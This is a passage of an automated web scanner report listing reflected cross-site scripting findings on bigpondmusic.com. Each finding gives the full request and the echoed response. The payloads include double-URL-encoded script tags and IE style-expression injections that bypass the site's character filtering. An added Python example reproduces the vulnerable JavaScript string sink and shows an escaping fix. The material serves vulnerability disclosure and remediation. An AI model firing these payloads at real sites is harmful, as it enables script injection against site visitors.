...[SNIP]...

2.240. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 44700'%3b4c034bcd425 was submitted in the REST URL parameter 1. This input was echoed as 44700';4c034bcd425 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse44700'%3b4c034bcd425/Albums/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88263


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
rabpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse44700';4c034bcd425';
   s.prop4 = 'albums';
   s.prop5 = 'newrelease';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' +
...[SNIP]...

2.241. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5688%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e051b30ca398 was submitted in the REST URL parameter 1. This input was echoed as e5688"><script>alert(1)</script>051b30ca398 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browsee5688%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e051b30ca398/Albums/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browsee5688"><script>alert(1)</script>051b30ca398/Albums/NewRelease/Format-Single/By-ReleaseDate" />
...[SNIP]...

2.242. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fce7e'%3b39af1d7f4f7 was submitted in the REST URL parameter 2. This input was echoed as fce7e';39af1d7f4f7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/Albumsfce7e'%3b39af1d7f4f7/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:12:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88047


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse';
   s.prop4 = 'albumsfce7e';39af1d7f4f7';
   s.prop5 = 'newrelease';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.p
...[SNIP]...

2.243. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5262b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06f403cc646 was submitted in the REST URL parameter 2. This input was echoed as 5262b"><script>alert(1)</script>06f403cc646 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums5262b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e06f403cc646/NewRelease/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:11:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88486


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums5262b"><script>alert(1)</script>06f403cc646/NewRelease/Format-Single/By-ReleaseDate" />
...[SNIP]...

2.244. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d34c'%3ba5781649f96 was submitted in the REST URL parameter 3. This input was echoed as 1d34c';a5781649f96 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse/Albums/NewRelease1d34c'%3ba5781649f96/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88178


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
globalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'browse';
   s.prop4 = 'albums';
   s.prop5 = 'newrelease1d34c';a5781649f96';
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4 + '-' + s.prop5;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4 + '|' + s.prop5;
   s.
...[SNIP]...
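Findings 2.233, 2.240, 2.242 and 2.244 all show the same sink: a lower-cased path segment written into a single-quoted JavaScript string literal in the SiteCatalyst block (s.channel, s.prop4, s.prop5). The following is an added example, not code from the BigPond Music site or from the scanner report. It replays the observed rendering beside a hardened version that escapes the value for the JavaScript string context, and includes a small check that confirms whether the rendered statement is still one closed string literal. The template string and the lower-casing replicate what the responses above show; the escaping table is the added remediation.

```python
import re

# Added example (not code from the BigPond Music site or from the scanner).
# Replica of the SiteCatalyst assignment seen in the responses above: the
# path segment is lower-cased and dropped into a single-quoted JS string.
TEMPLATE = "s.prop5 = '{value}';"

def render_vulnerable(segment: str) -> str:
    """Rendering as observed: no escaping for the JavaScript string context."""
    return TEMPLATE.format(value=segment.lower())

# Every character that can end a single- or double-quoted JS literal, start an
# escape, close the enclosing <script> block ("</script>"), or act as a JS
# line terminator is replaced by a hex/unicode escape.
_JS_ESCAPES = {
    "\\": "\\\\", "'": "\\x27", '"': "\\x22",
    "<": "\\x3c", ">": "\\x3e", "&": "\\x26", "/": "\\/",
    "\n": "\\n", "\r": "\\r", "\u2028": "\\u2028", "\u2029": "\\u2029",
}

def js_string_escape(value: str) -> str:
    """Escape a value for inclusion inside a quoted JavaScript string literal."""
    return "".join(_JS_ESCAPES.get(ch, ch) for ch in value)

def render_hardened(segment: str) -> str:
    """Same template, but the value is escaped for the context it lands in."""
    return TEMPLATE.format(value=js_string_escape(segment.lower()))

# One assignment of exactly one single-quoted literal whose body contains no
# bare quote, lone backslash or newline. Anything else means the input broke out.
_ONE_LITERAL = re.compile(r"s\.prop5 = '((?:[^'\\\n]|\\.)*)';")

def string_stays_closed(statement: str) -> bool:
    """True if the rendered statement is still a single string assignment."""
    return _ONE_LITERAL.fullmatch(statement) is not None

if __name__ == "__main__":
    payload = "NewRelease45536';fd30ddbd2c3"   # payload from finding 2.233
    for label, out in (("vulnerable", render_vulnerable(payload)),
                       ("hardened", render_hardened(payload))):
        print(f"{label:10} {out}   closed={string_stays_closed(out)}")
```

The scanner payload only proves that the string can be terminated; the same sink accepts a full payload such as '; alert(1); // once the terminating quote is in place, so the Firm confidence reflects the scanner's incomplete PoC, not a safe sink. Hex-escaping the quote, backslash and angle brackets (rather than backslash-escaping the quote alone) also prevents a </script> sequence inside the string from closing the script block.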

2.245. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 14f30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757d1c7ef65f was submitted in the REST URL parameter 3. This input was echoed as 14f30'style='x:expression(alert(1))'57d1c7ef65f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease14f30%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757d1c7ef65f/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88579


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease14f30'style='x:expression(alert(1))'57d1c7ef65f/Format-Single/By-ReleaseDate' />
...[SNIP]...

2.246. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload caec7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e91020edd044 was submitted in the REST URL parameter 3. This input was echoed as caec7"><script>alert(1)</script>91020edd044 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewReleasecaec7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e91020edd044/Format-Single/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88575


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewReleasecaec7"><script>alert(1)</script>91020edd044/Format-Single/By-ReleaseDate" />
...[SNIP]...

2.247. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0463%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276ef5806c8ed was submitted in the REST URL parameter 4. This input was echoed as c0463'style='x:expression(alert(1))'6ef5806c8ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Singlec0463%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25276ef5806c8ed/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88817


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease/Format-Singlec0463'style='x:expression(alert(1))'6ef5806c8ed/By-ReleaseDate' />
...[SNIP]...

2.248. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0b15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e277163c8c81 was submitted in the REST URL parameter 4. This input was echoed as b0b15"><script>alert(1)</script>277163c8c81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Singleb0b15%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e277163c8c81/By-ReleaseDate HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88265


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/browse/Albums/NewRelease/Format-Singleb0b15"><script>alert(1)</script>277163c8c81/By-ReleaseDate" />
...[SNIP]...

2.249. http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /browse/Albums/NewRelease/Format-Single/By-ReleaseDate

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4d151%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252701bd4018a0a was submitted in the REST URL parameter 5. This input was echoed as 4d151'style='x:expression(alert(1))'01bd4018a0a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /browse/Albums/NewRelease/Format-Single/By-ReleaseDate4d151%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252701bd4018a0a HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:13:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88395


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<link rel='canonical' href='http://bigpondmusic.com/browse/Albums/NewRelease/Format-Single/By-ReleaseDate4d151'style='x:expression(alert(1))'01bd4018a0a' />
...[SNIP]...

